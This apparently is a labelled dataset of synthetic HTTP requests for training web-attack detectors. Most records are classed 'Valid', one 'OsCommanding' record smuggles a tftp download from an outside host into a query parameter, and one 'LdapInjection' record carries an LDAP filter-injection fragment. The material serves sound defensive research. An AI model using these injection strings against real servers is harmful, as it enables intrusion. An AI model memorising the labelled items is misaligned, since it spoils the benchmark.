Cookie: iP.Fobject9FUO=&;uecUoNn=440827043;2xp=pFr9;anaoitw=el+t
Cookie2: $Version="29"
Date: Mon, 16 Aug 04 09:34:50 GMT
ETag: W/"GmYF9jC6Wr07CelpAo"
Expect: 100-continue
From: ntlyi@ntsbrh.org
If-Modified-Since: Fri, 04 Mar 05 14:39:23 UTC
If-Unmodified-Since: Tue, 10 Nov 09 11:52:06 UTC
If-Match: "pMVeOM2.h3qzh-JyB"
If-None-Match: "uKsX-IMHeY8G01dIz1"
If-Range: Thu, 28 Sep 06 06:49:42 GMT
Max-Forwards: 5
MIME-Version: 7.6
Pragma: y3ei=tis
Proxy-Authorization: NTLM bTJyYmw1ZGJudG90OWVydDR3aUEwdUgzZWFoYW1zYmUxZGV0ZW1oa2g=
Authorization: Basic RmlvejNyZGY6aGVJZGl4bw==
Range: -556359,8231-704117,-42034
Referer: http://www.paoo.com/etpic/oiqncu.asp
TE: chunked
Trailer: Cache-Control
User-Agent: Mozilla/6.5 (compatible; Konqueror/4.8; Win98; aoai; Rudgx3; nerkpsnEtp)
UA-CPU: x86
UA-Disp: 6221,5236,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 0313x1494
Via: 2.3 www.tHnxot.html
Transfer-Encoding: identity
Upgrade: hht/4.9, pisd/0.7, ngc/6.5
Warning: 739 239.251.202.243 "odbwbvaetEeIeesgo1" "Mon, 03 Sep 07 05:14:16 GMT"
X-Forwarded-For: 43.8.248.224
X-Serial-Number: 7747668675736673
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

camhphirech=lh&EimElweiAhbteP=&meta&-JSg0NFJA=I&Dcatusr6jqWlsbin=2eopcawR0nI&DGsv-=ces>Chksrn deo&tHwindow.open6QtY=952534762&3eegOhaihit4=/f&e5meidf=tpT/inlsseaOIjo&a5Mse5eV6asa=Sblhte&zdr6iuni=2749&aesSed32Py73j=ds|ream@%e= &thr21agA0Rnq=rLtNh&aiptgdhp=n2ad'etc&Ry7aT6v=bkITkccf-U&iuulwec3etE=rgK2PU

End - Id: 34229
Start - Id: 34767
class: Valid
POST /L8bMcDA/y.0R_.QVxzJAD7@TXi/ah38K6LQhY46rl/o2atecytehmsumlemaN/e4kpl/kNXD@05Apogb5O/25SF10system/cSMN05j6qinclude/ArorchaElasbo/rnnWtui24NuCbLnfS.msf? HTTP/1.0
Content-Length: 125
Content-Language: n3dmt,ntda,z
Content-Encoding: compress
Content-Location: http://www.Ian3.org/9nms7oL/t3c2i/edatj/mlAba.asp
Content-MD5: b2V6cW5paUg3ZDB0bHdkeA==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 30 Mar 04 17:50:22 CET
Last-Modified: Mon, 26 Jan 04 06:46:07 UTC
Host: 186.151.100.93:80
Connection: close
Accept: */*
Accept-Charset: *;q=0.8
Accept-Encoding: compress, deflate, gzip;q=0.0
Accept-Language: *
Cache-Control: no-transform
Client-ip: 38.141.39.26
Cookie: aes=977950;h-vA=bs
Cookie2: $Version="4"
Date: Sun, 24 Jan 10 22:07:53 CET
ETag: W/"Fr1ANCvA0_piKy3R"
Expect: rnuaet
From: iaoc1brO@mxbt8wsL.be
If-Modified-Since: Fri, 13 Jul 07 11:51:02 GMT
If-Unmodified-Since: Wed, 08 Feb 06 20:58:54 GMT
If-Match: "FemujSPC8eSb3wF5"
If-None-Match: *
If-Range: Sat, 09 Aug 08 10:35:43 UTC
Max-Forwards: 95
MIME-Version: 4.8
Pragma: no-cache
Proxy-Authorization: sssem eiteh9=s7a8xhej
Authorization: NTLM d2l0aW9zYm9xbW9sbW1tMHVmc3V0c2VlYXJzZmUzbGhvYU5zMmlkbmV6YWdh
Range: 40725-825,171943-,0918-722285
Referer: /otnak8e/spplsple.jsp
TE: deflate,gzip;q=0.0,deflate;q=0.9
Trailer: Accept
User-Agent: Mozilla/2.4 (X11; U; Solaris 9.4; rh-aa; rv:3.2.8) Gecko/66994556
UA-CPU: StrongARM
UA-Disp: 456,5311,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 012x6742
Via: 3.5 www.anee.gif, FTP/4.5 www.aoijhTsn.tiff
Transfer-Encoding: compress
Upgrade: slct/7.5
Warning: 563 www.oSibytw.htm "7HeelDne" 
X-Forwarded-For: 59.6.197.154
X-Serial-Number: 438515700357527
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

n0suetwtp=7984224&sinrME=3247831&al8cb=r8gYG03j&n5atl43ldni=rdJntl3pneb&x8LH=6618346&ers=gelbotn&mubsehp9te0y6t=htaccesesam i

End - Id: 34767
Start - Id: 10315
class: Valid
GET /eiIvU8YADdWVwI/A4M/tfEQszaSj0/rxtgnaoeoqeasdgiei/KobjectZ.mspx?euh5s5=atelni&hhf=9248&Aeuu=%3BeotcsGescriptoo&06S@76KMcatUIF=f+hun&lsZkdFRDnhx=82876&oeooEapug9m4e=0g%26mdt%5B+etNe%3Aor&s05ir=tinputg%24htaccesandoomochaz%40window.opengg&efe=%26s&cnr=tpassthru&U8tnp=64239&hr=bo5%3Bx HTTP/1.0
Host: www.taana.st
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: utf-8, iso-8859-2;q=0.9, cp-936;q=0.1
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: only-if-cached
Client-ip: 42.80.49.249
Cookie: esuneDocwhFiash=a/6d tErnss
Cookie2: $Version="56"
Date: Sat, 05 Jun 04 11:44:37 UTC
ETag: W/"EYezGROZhzumkOacy"
Expect: dCfcs4
From: dhQcsxrm@7ttnM.org
If-Modified-Since: Thu, 23 Mar 06 14:05:15 CET
If-Unmodified-Since: Sun, 30 Mar 08 05:08:08 GMT
If-Match: "Jad_RqPoY_tnC5ri"
If-None-Match: ".6StaZKcM4H6ZWJ"
If-Range: Fri, 29 Apr 05 10:01:58 UTC
Max-Forwards: 98
MIME-Version: 3.2
Pragma: u7sjvi=i
Proxy-Authorization: Digest algorithm=rfff
Authorization: NTLM ZTNmYWVhMXpvdFV1b3llNXNhY1NlNjh6aWFzZEV4cnV6ZQ==
Range: 632334-29563,0-36
Referer: http://R9hcaexn.net/mieaws/hait/frude.pdf
TE: trailers,trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/5.2 (Windows; U; Win 9x 9.2; C9-na; rv:1.9.4) Gecko/40580336
UA-CPU: PowerPC
UA-Disp: 2081,300,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 032x7737
Via: 1.7 www.eHpag1e.gif, 1.5 19.138.147.176:40705
Transfer-Encoding: deflate
Upgrade: pnge/0.2
Warning: 971 12.117.57.163 "zsxuhrfhateer8" 
X-Forwarded-For: 106.154.197.193
X-Serial-Number: 780593
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 10315
Start - Id: 9480
class: Valid
GET /igO9w9nhn2f3NpBi5aC/el2deleteandXRboot.iniEbWHUmail/eTc/aUOZzSvkfwoKY4C.gPq/1btwrp/Baccess_logysW/esai3nmgjrtnr/oaldotxTjenntuiui.js?dpYTfj6psqrm=am3zn&sHzwkbS2@u=wwAlntEfx&f7e=ejvl3l&eecrRs=aiv+tar+wkts%3Dul&NZstyle6kWk=iagHcitmp2zohitth&dzch=nAlrhjeaeR5nu&oaxhra1mm=thP86gw&sonCceSi=man HTTP/1.1
Host: 217.211.232.223:0996
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.8
Cache-Control: min-fresh=177
Client-ip: 109.204.149.75
Cookie: hthghlykW4shsh=uenoFw7stake;sedzsber=b6replace1/;en74p=tri)f;eodhwliroSernan=92
Cookie2: $Version="2"
Date: Tue, 18 Apr 06 07:12:31 CET
ETag: W/"OV8lIQPxR4a1ovUasGG"
Expect: 100-continue
From: eo4la2@wre9irnxdA.be
If-Modified-Since: Mon, 12 Jan 04 06:49:19 CET
If-Unmodified-Since: Wed, 14 Apr 10 07:34:53 GMT
If-Match: "-IUELM9IHVfIir0"
If-None-Match: *
If-Range: *
Max-Forwards: 0817
MIME-Version: 4.0
Pragma: d='yneec'
Proxy-Authorization: Ytur ieceeric=xuqi
Authorization: NTLM T29FZXZ1aWU1aXM3aHBwYzdZZWVlbHlqaUU5RW9kY21ob24=
Range: -6,7-441
Referer: /Rreoi/ihsoscEg/lqcut/ieaeaol0/rneEo.rar
TE: gzip;q=0.0,trailers
Trailer: Accept
User-Agent: Mozilla/5.8 (compatible; MSIE 4.8; SunOS sun4u; oegusett; ymhe)
UA-CPU: MIPS
UA-Disp: 635,8626,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 279x7075
Via: pj2/6.1 58.231.161.184:7
Transfer-Encoding: deflate
Upgrade: dttwl/5.1, totora/7.4, s2q/7.4
Warning: 567 www.enh7hD.js "3todocz5ta" "Tue, 13 Nov 07 04:16:24 UTC"
X-Forwarded-For: 140.234.18.98
X-Serial-Number: 114650430157226
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 9480
Start - Id: 18919
class: Valid
GET /H64passwdD.q/sX.lDuzr/yMqqCgm7TRA2t/xAMirmKbinxAopsyb_g/YservicesR_direplaceCd/8QEKLDI3ecbqfs/uGmNv1x8jAk5a5y.gif? HTTP/1.0
Host: 13.105.33.14:0
Connection: shbe
Accept: */*;q=0.3
Accept-Charset: *;q=0.0
Accept-Encoding: identity
Accept-Language: *
Cache-Control: ktr4cei='ee5'
Client-ip: 166.177.25.206
Cookie: hn7tyht3rinsgz=ineoVhviaccess_log e;inputSdhjpjKeH=293
Cookie2: $Version="674"
Date: Wed, 20 Oct 04 14:55:52 CET
ETag: W/"su.O@LDx_sPJFRT9"
Expect: 100-continue
From: yjsS@orU9r.uk
If-Modified-Since: Sat, 09 Dec 06 04:11:07 CET
If-Unmodified-Since: Mon, 09 Nov 09 01:01:15 CET
If-Match: "u.D3Ac7rfbDV@qij2-W"
If-None-Match: "xP2Ogq1WPNqI2sd"
If-Range: "ThL1tkM.1J7BsCyqe"
Max-Forwards: 92
MIME-Version: 3.0
Pragma: nnesddN=en
Proxy-Authorization: Digest nonce
Authorization: NTLM bWhlOHNhZmdlbmV0YW90eGVkaW9zajRoYm5Jbnk3YUs1cnQ=
Range: -69
Referer: http://wxar.de/3e7rttgr/n0be/i7jt.dll
TE: trailers,gzip,trailers
Trailer: User-Agent
User-Agent: sjeatnTaboabar
UA-CPU: Sparc
UA-Disp: 745,1444,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 905x897
Via: 3.0 57.157.116.2
Transfer-Encoding: compress
Upgrade: ensdmo/4.9, 8gvNs/8.5, evntyz/9.1, 7nshfi/4.0
Warning: 226 123.83.144.13:9585 "laaos" 
X-Forwarded-For: 85.156.7.96
X-Serial-Number: 27260320301
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18919
Start - Id: 28347
class: Valid
GET /4icudcntuh8dnjbeSha/GgmQTZRYP/u4/rpp5spdldtcoar37/r8ETIQVRO3L2sYZ/7k6replacebnB/-bAoGs8.html?2eehh=841091&P-OTP=lC6oo&oomeprva2=158&s4eteznEw=de&yPKpAuA=a%40nzn6insertd%3A&thult=Shnm+enettqi&toep=bwai%2Beba&gadxitthseee8y=yr%2B&s0qet=wxTs96zA HTTP/1.0
Host: 220.220.193.128:80
Connection: znigo2R
Accept: */*
Accept-Charset: *;q=0.6
Accept-Encoding: gzip;q=0.6, gzip;q=0.1
Accept-Language: nvo-nt;q=0.4, aohtn-btttiHhr
Cache-Control: no-transform
Client-ip: 27.241.91.89
Cookie: loe=5%EiNyoE=2;dSt=EEeaccept
Cookie2: $Version="57"
Date: Thu, 20 Jan 05 20:26:59 UTC
ETag: "vQc51TYeNs.paEi1AXZp"
Expect: 11it=oaetbset;ihoOp3l
From: nicserws@tdhtrrpo.net
If-Modified-Since: Wed, 25 Mar 09 18:23:41 UTC
If-Unmodified-Since: Sat, 31 Dec 05 06:28:29 GMT
If-Match: "ae7GRja41vl9-ZJa7a"
If-None-Match: "BhTd7CDul9oxrpYubL"
If-Range: Wed, 11 May 05 21:04:00 CET
Max-Forwards: 5
MIME-Version: 2.0
Pragma: no-cache
Proxy-Authorization: Basic bmhycGhuVzp0Y2VUYnB0dA==
Authorization: Basic YXlvYWhhdDpkc2dFcGxhYw==
Range: 2735-73,95-
Referer: /irne4seR/enwuiglw.bin
TE: deflate;q=0.3,chunked,trailers
Trailer: Referer
User-Agent: Mozilla/9.3 (Windows; U; Windows NT 4.8; eh-rt; rv:0.6.4) Gecko/48488440
UA-CPU: StrongARM
UA-Disp: 547,716,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 084x4486
Via: HTTP/0.5 104.226.96.99, 3.4 250.93.225.233
Transfer-Encoding: compress
Upgrade: mNe/8.8, ehIbla/4.3, s6oaa/4.9, cih/1.0
Warning: 820 33.84.92.164 "ltswrjre0O2fta" 
X-Forwarded-For: 156.99.87.237
X-Serial-Number: 4245119888
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28347
Start - Id: 11193
class: Valid
GET /tNenne/1g1IQhaving/7oznu/imsttatN/eebhesfea/BW0dfiBh_gphpaccess_logunionKh/q7aaaehnwqlEucacepda/nobhrrkaHhunn2typnb/ozUbZIGrYl/uFjW/6woteoaeo6s3hWncze.aspx?servicessvarW=r&yaeI3hor56gso=bU5&1A-pdwjWQG=pN&atts6g5mrzu=0427478&lp=a&tNi=8++au+o5Etwp-ahne&wZpa=7537279208&ygouus1yt6a=php%3A9zopensn4E&Ke4fottrAeNsn=r&PKmszftpe=iooorbTifau&KZcpsTmh=pho%241es%25fbed HTTP/1.0
Host: www.tYig.fr:80
Connection: xstk
Accept: text/*;q=0.4, audio/basic;q=0.6, audio/*;q=0.6
Accept-Charset: *
Accept-Encoding: gzip;q=0.6
Accept-Language: Rpopf9-koTrh;q=0.6, hbrieroe-k
Cache-Control: n='doyt'
Client-ip: 194.194.46.222
Cookie: uyloJGheoe=tOdneenttt;ZJuallG7=el2Ri 9'la?iohn
Cookie2: $Version="56"
Date: Wed, 29 Dec 04 15:05:18 UTC
ETag: "pa3UkJusathI0wj9l"
Expect: 100-continue
From: oner40@a3mRaitss.com
If-Modified-Since: Sat, 03 Apr 04 21:22:46 GMT
If-Unmodified-Since: Wed, 12 Mar 08 24:18:09 CET
If-Match: *
If-None-Match: "AhOn-XxNDvD00GS"
If-Range: Tue, 20 Jan 04 17:19:26 CET
Max-Forwards: 81
MIME-Version: 3.9
Pragma: pgrgN=lhvy2o
Proxy-Authorization: Digest cnonce="irua"
Authorization: Digest nonce
Range: 19-986
Referer: /wtsaonep/agax/eD99mee/Trlssse/id9z.jpeg
TE: deflate
Trailer: Warning
User-Agent: eteesjgi (ueSQe3; 5sch4sgS70; arNvviH6)
UA-CPU: StrongARM
UA-Disp: 473,1490,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 1597x0250
Via: FTP/4.2 248.243.144.48, 9.6 www.s2iqvct.html:360
Transfer-Encoding: gzip
Upgrade: aev/1.5, 3me/3.4, 5bni/1.4, int/8.3
Warning: 530 www.ti29tmpl.css:41657 "oWDSevoc9ubo" 
X-Forwarded-For: 133.197.157.12
X-Serial-Number: 450563801661696804
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11193
Start - Id: 43366
class: OsCommanding
GET /1abaaTixd3eUxeogtm/hBCh/1VrXopena@yrWp/eNgn/G2rnG2ddti/mypsoiiafneaaBdajnc/lrduemey30rMtxdlagln/2e3qmnseyebnh/5stdinhn9b40drshutdownQf5/ireoqeo0euA6oi/asez62dd/vh5WB0z.7lNfGytMip.sh?tgwrn9iw5=%3Daupdate+&elapneeo=%27%3B+tftp+-c+get+++www.orne.com%3A%2Fma.tar&0tD7A=r-Isl&iK9@wgetLyHQK=s0m4Sw HTTP/1.1
Host: www.inspdhhh.org:80
Connection: l4mde
Accept: image/*
Accept-Charset: big5
Accept-Encoding: deflate, deflate;q=0.5
Accept-Language: *;q=0.5
Cache-Control: only-if-cached
Client-ip: 112.192.174.81
Cookie: hrciNiqipert=4P16bqxIR;een6ljrtoneep=edttTruNmmtn
Cookie2: $Version="7"
Date: Mon, 12 Apr 10 23:06:36 CET
ETag: W/"MfQ3kG-@pCjXqY2jW"
Expect: 100-continue
From: xrca@p4bIo.st
If-Modified-Since: Wed, 29 Mar 06 24:44:23 GMT
If-Unmodified-Since: Wed, 07 Feb 07 11:22:56 CET
If-Match: *
If-None-Match: "p2@jPP62BlQdFRMkN2"
If-Range: Tue, 11 Dec 07 17:46:42 GMT
Max-Forwards: 2
MIME-Version: 3.7
Pragma: no-cache
Proxy-Authorization: Basic c3RvbzpFcHRvbG0=
Authorization: stt7m heees=nnhm3bi
Range: 9-
Referer: /tniyhs/c6nmNm.jpeg
TE: trailers
Trailer: Authorization
User-Agent: Mozilla/1.0 (compatible; unktqN; Open BSD i586; lnafhfae; yanjh; Capzifeh)
UA-CPU: 68000
UA-Disp: 106,481,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 552x8251
Via: Mdbet/5.1 www.etmu0215.shtml, ntqa/8.9 www.nfhbmaL.png, 7.3 www.anty.css
Transfer-Encoding: compress
Upgrade: gso/5.0, rNa5/4.2, pdodni/6.9, hdrrTE/2.2
Warning: 782 www.e5rte.tiff:876 "07ituthT2yrwlHit1ah" "Sat, 29 Jul 06 07:27:58 CET"
X-Forwarded-For: 246.239.174.69
X-Serial-Number: 68319129
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43366
Start - Id: 34537
class: Valid
PUT /teho0awet2odweeruvhl/ued9KdVovbpk-URkEk.htm? HTTP/1.1
Content-Length: 232
Content-Language: 0wi,dbtwb
Content-Encoding: compress
Content-Location: /wwsn8fe/bssih.php4
Content-MD5: aTFoNXJPZGVob2l3ZnN0bw==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 06 Feb 05 05:34:04 GMT
Last-Modified: Sat, 14 Apr 07 01:23:22 GMT
Host: www.ddqalw.ch
Connection: q5tlNu8x
Accept: */*
Accept-Charset: x-mac-turkish;q=0.8, iso-8859-15, iso-8859-6, iso-8859-7, cp-936;q=0.1
Accept-Encoding: *;q=0.1
Accept-Language: *;q=0.0
Cache-Control: max-stale=67878
Client-ip: 217.109.107.241
Cookie: sO4Tre=6l+i'winnt;lwevgn2d=itl84ofeoe9bNiihhU;uwO18jhtaccesV=3ten;sclv=a;f0etfdoew4Soo=&/
Cookie2: $Version="025"
Date: Mon, 11 Jun 07 10:17:15 GMT
ETag: "mRjdLgMUo4W-ym0RUck"
Expect: ehcptate
From: aiiTbdt@stretps.it
If-Modified-Since: Fri, 13 Mar 09 10:51:06 GMT
If-Unmodified-Since: Thu, 06 May 04 09:28:15 UTC
If-Match: "x._oXgjjiP@Y0FeE"
If-None-Match: "CPTyi1mUZ-W7nKzGvx"
If-Range: Sat, 14 Feb 09 03:35:50 UTC
Max-Forwards: 1079
MIME-Version: 0.1
Pragma: Yj2j='eizt'
Proxy-Authorization: Basic ZVMyZ2F0OnN1cnRldmN5
Authorization: Digest nc=40cE4F05
Range: 934-
Referer: /reo1gi.mp3
TE: chunked;q=0.9
Trailer: Via
User-Agent: Mozilla/1.7 (X11; U; SunOS sun4u 6.3; of-Eb; rv:7.6.8) Gecko/25232911
UA-CPU: MIPS
UA-Disp: 245,2195,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 066x785
Via: 2.7 www.oz5ana.jpeg, FTP/1.5 www.9iti.png:749
Transfer-Encoding: gzip
Upgrade: kRoot/8.0, ash/7.6, qah/9.5, stwee/0.8
Warning: 065 65.77.102.167 "nhro5a2" 
X-Forwarded-For: 38.219.193.159
X-Serial-Number: 52771929
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~

MUVxp_.H=;lciexecR0&CvymtmpXOi=[toi[s7nbetweenetoaN&araiwEeeera=ee0ca4Ererihpl&cwCs=91936685&cedoizttoraGnls= pdudmohemra2&H46lx6AmJ=hased:uhlh=Ee&.wgetj3kmEB=uTT&yh36n6dteir=nEgge&nyl1bim8edroSt=tbO&hc5EohlwoerLwe=8003932

End - Id: 34537
Start - Id: 4308
class: Valid
POST /-4@I0R/gJ2S59dkMwzi-Quiv.R/jis7hsiwccreA.html? HTTP/1.1
Content-Length: 24
Content-Language: t,rteqnhe
Content-Encoding: compress
Content-Location: http://dTeudRhe.it/Hot48ym/hpytr/TBSgeen.asmx
Content-MD5: bm90ZGNhbzVpZGVlYXRvbw==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 08 Aug 07 01:30:20 GMT
Last-Modified: Wed, 31 Aug 05 17:09:29 CET
Host: www.Iotd.net
Connection: deRsp
Accept: */*;q=0.6
Accept-Charset: x-mac-chinesesimp, utf-8, iso-8859-15
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: no-store
Client-ip: 42.84.208.76
Cookie: l1hnleoha4ee=eEe7toni;G8obepzsee=wmtlshs;bLUm=enetcat;isyaaauiroien=)l@oeNrc;.optnO5WpO=wErcpduo4c
Cookie2: $Version="33"
Date: Thu, 29 Oct 09 01:00:16 UTC
ETag: W/"tSBUj.txme_bj4p2"
Expect: 100-continue
From: hniryitt@cesrtata.de
If-Modified-Since: Sat, 15 Jul 06 10:03:36 CET
If-Unmodified-Since: Tue, 03 May 05 13:31:19 GMT
If-Match: *
If-None-Match: "7KtnCPhoj2.W-nM"
If-Range: Sat, 09 May 09 08:22:17 CET
Max-Forwards: 359
MIME-Version: 4.2
Pragma: no-cache
Proxy-Authorization: utcbmb 1ade57=6afgps
Authorization: Basic d25UYWloYWU6ZG9ubWlldGM=
Range: 015984-952,-362
Referer: http://nuev.it/wSeOa/9o3t/O69t/ylhbtaiE/snot.bin
TE: deflate,deflate;q=0.0
Trailer: Trailer
User-Agent: Useent (tC0JUM.; sVaJAIF7v; pVg.EsqMV; e6_Vcy)
UA-CPU: MIPS
UA-Disp: 9274,388,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 470x229
Via: HTTP/6.3 www.eia7s8df.gif
Transfer-Encoding: compress
Upgrade: Unh/4.4
Warning: 230 www.eetm.shtml "attezh8alecnXforas" "Sun, 16 Sep 07 10:35:28 GMT"
X-Forwarded-For: 152.59.223.205
X-Serial-Number: 763527830463
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

h50=66&orAarocee=2706551

End - Id: 4308
Start - Id: 13781
class: Valid
GET /nk1P/yfnJhio@2mdQJC/F8TunionjUn76Pi/oXvi_fHmRNZSvVYWj/tt.RQr./eolwnihoey/efnA4ot7/Ab3ts6bnhG/g-EX7/tJYXBwlrw/QBhRVOvar.html?ienhd=taAcxeiservicesxHeaordiv&5cwi7ciii=8&hs=sndew&wou=rc%2Bychj&wteage=2260 HTTP/1.1
Host: www.dmeb.fr:80
Connection: keep-alive
Accept: image/jpeg;q=0.7, video/*;q=0.4, text/*
Accept-Charset: big5;q=0.1, iso-8859-2
Accept-Encoding: *
Accept-Language: o-6utqwp0o;q=0.1, nekst-mrxsY4ae, lqarmad-nidmolIs
Cache-Control: only-if-cached
Client-ip: 127.177.149.169
Cookie: ae3gsscohawo=5275234
Cookie2: $Version="6"
Date: Fri, 13 Aug 04 07:21:35 UTC
ETag: "hN05NJsSrpN0per2"
Expect: 100-continue
From: kaat@losa.de
If-Modified-Since: Sat, 06 May 06 08:54:20 GMT
If-Unmodified-Since: Thu, 30 Aug 07 21:43:28 UTC
If-Match: *
If-None-Match: "chQuViPMTP71g_4"
If-Range: *
Max-Forwards: 634
MIME-Version: 5.6
Pragma: Icszes='vHt'
Proxy-Authorization: Digest qop=auth
Authorization: Basic bXRTczphaGFwVA==
Range: -1636,47220-,49348-
Referer: http://nl5ss9es.cz/72gkaan/uboeruhu/nytiipAo/eeei.php3
TE: trailers,trailers,trailers
Trailer: Cache-Control
User-Agent: Mozilla/6.8 (X11; U; Open BSD i386 4.1; hw-le; rv:1.1.8) Gecko/03667289
UA-CPU: x86
UA-Disp: 709,7535,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 609x411
Via: 6.1 www.ftp1wy.tiff:5
Transfer-Encoding: gzip
Upgrade: ssee/8.4, tag/6.0
Warning: 340 12.142.158.70 "icncsoww5Yi" 
X-Forwarded-For: 231.109.137.254
X-Serial-Number: 26172268
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13781
Start - Id: 2518
class: Valid
GET /zSAphpG/ycsadlenriowdi4/Ds/cnuz6cUk9dOoieto/n0eniIAnf/HtAbyssTiiitd/dmzj-OPJzW0X.htm?R9lsutadi=rreplaceteu%25u+pV%7CRexecaI&rae6utn=1976227 HTTP/1.1
Host: www.snhtLb.ch
Connection: keep-alive
Accept: audio/*
Accept-Charset: *
Accept-Encoding: *;q=0.4
Accept-Language: *
Cache-Control: no-transform
Client-ip: 171.191.7.222
Cookie: EZ@FXstdinpassthru@C=X2e;Agsock_streamIwindow.openVdW2var=mee$feaRlobjectnreq;WfTj=mug;ardbNtt=7093
Cookie2: $Version="644"
Date: Tue, 15 Aug 06 11:47:54 GMT
ETag: W/"PG-XtCI568-RcwX"
Expect: 5erAaA
From: lifcswz@aveP.cz
If-Modified-Since: Tue, 07 Jun 05 12:19:02 GMT
If-Unmodified-Since: Wed, 23 Mar 05 04:09:56 GMT
If-Match: *
If-None-Match: "ZLw_E5qxXGhUkqr7G7P"
If-Range: Mon, 03 Aug 09 04:08:03 GMT
Max-Forwards: 4
MIME-Version: 4.0
Pragma: no-cache
Proxy-Authorization: nitnl fcf4iz=aCTsovIa
Authorization: NTLM c2xhYW50ZWV5ZzdneDFlY2F4c3J5bHNzZXN1Y2hib0V1ZWllYWJlbGw=
Range: 32-6,-041504
Referer: http://eIteooac.uk/wentksg/iert/wanAgIr/F4ClgLUi.mpg
TE: trailers,trailers
Trailer: Host
User-Agent: Mozilla/4.0 (X11; U; SunOS sun4u 2.0; 8c-so; rv:7.1.4) Gecko/77744125
UA-CPU: MIPS
UA-Disp: 5722,6200,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 831x8702
Via: FTP/3.9 www.wyt6ih.js:75
Transfer-Encoding: identity
Upgrade: m50ll/0.0, a5sim/2.2, yic0t3/9.0
Warning: 785 207.222.17.0 "hlsTdaueet1" 
X-Forwarded-For: 8.183.220.41
X-Serial-Number: 347745233258688600
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2518
Start - Id: 37707
class: LdapInjection
POST /jGApMGNlr/VHwlZnD7vreplace4LH/llyinnj20oa/nL.M/ms/eosusititeusoroiIdh/deLgaelhaitguhiro/7nl0Evavtat/a2T1zsrn-KP6KNcr6dMR.html? HTTP/1.1
Content-Length: 339
Content-Language: sddwap,toqf,dih
Content-Encoding: gzip
Content-Location: /cfayn/s8taR.txt
Content-MD5: bkVydHNuZWVyc2UxYWdlZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 17 Feb 08 08:47:11 CET
Last-Modified: Tue, 29 Sep 09 04:35:16 GMT
Host: 46.161.149.214
Connection: 1g6xel
Accept: */*;q=0.6
Accept-Charset: x-mac-turkish;q=0.2, x-mac-korean
Accept-Encoding: *;q=0.3
Accept-Language: r-rewN, Deraa-umoiyo;q=0.1
Cache-Control: no-transform
Client-ip: 11.82.10.207
Cookie2: $Version="321"
Date: Sat, 25 Mar 06 21:00:54 CET
ETag: W/"Cs9xygawlnPcuJ3Z1I"
Expect: 6bsr5le=isoccne
If-Modified-Since: Tue, 15 Mar 05 15:13:20 GMT
If-Unmodified-Since: Mon, 04 Oct 04 15:56:13 UTC
If-Match: *
If-None-Match: *
If-Range: "DZ70iyTX.ylRK0e9Dy8t"
Max-Forwards: 2
Pragma: no-cache
Authorization: NTLM bWZ0cm5hbmpqbmR6MW5vN3NyeW5wZG95dGVhaG90bGRlNm9lRW9hZXQ1dzg=
Referer: /weiBdahs/2t4TaxaM/t2ttetr/oee3s.tiff
TE: trailers,trailers
User-Agent: lpsso5hi
UA-CPU: MIPS
UA-Color: color16
UA-Pixels: 8766x859
Via: FTP/9.3 19.196.17.175, FTP/5.9 178.93.198.68:8979, 9.2 47.193.39.147
Transfer-Encoding: identity
X-Forwarded-For: 34.122.30.225

-VuS=97174&pixal3oryuoady=vev/&iufghyUtssaanhS=evA2JzNNi.N&ecalriEwjaonf0=tarastdrciscoeeh&70Uyr=t9catRhtsyajexecqsME@ur9&laI=hw)(    |(tan=*)&heh7u=271097&Tt8ote6nEa=t)aediv&qsetesa=eJvet&ulewh=sarspEObrfmovfla&lr4LNaend7tct=Ze:rtmeQ07pos&s7u2y@VvrV=22539&oeybeee=fW2s1Ets&a1soTht=m4iTWap.uT&rla7rthnbeR=6NJyynneaae3cm

End - Id: 37707
Start - Id: 9090
class: Valid
GET /e8YHKXGkbsKZnqvC/Y0metavZRzspsccW.swf? HTTP/1.1
Host: www.cw9gtu.com
Connection: close
Accept: */*;q=0.5
Accept-Charset: windows-1251;q=0.1, x-mac-chinesesimp, cp-936, iso-8859-8-i
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: ssd4='1oharee'
Client-ip: 153.209.86.89
Cookie: Ro6um=49106693;nkVruntssl3stur=yi/0;updateLlk=scttno4Hefa9e z
Cookie2: $Version="10"
Date: Sat, 26 Nov 05 01:56:50 CET
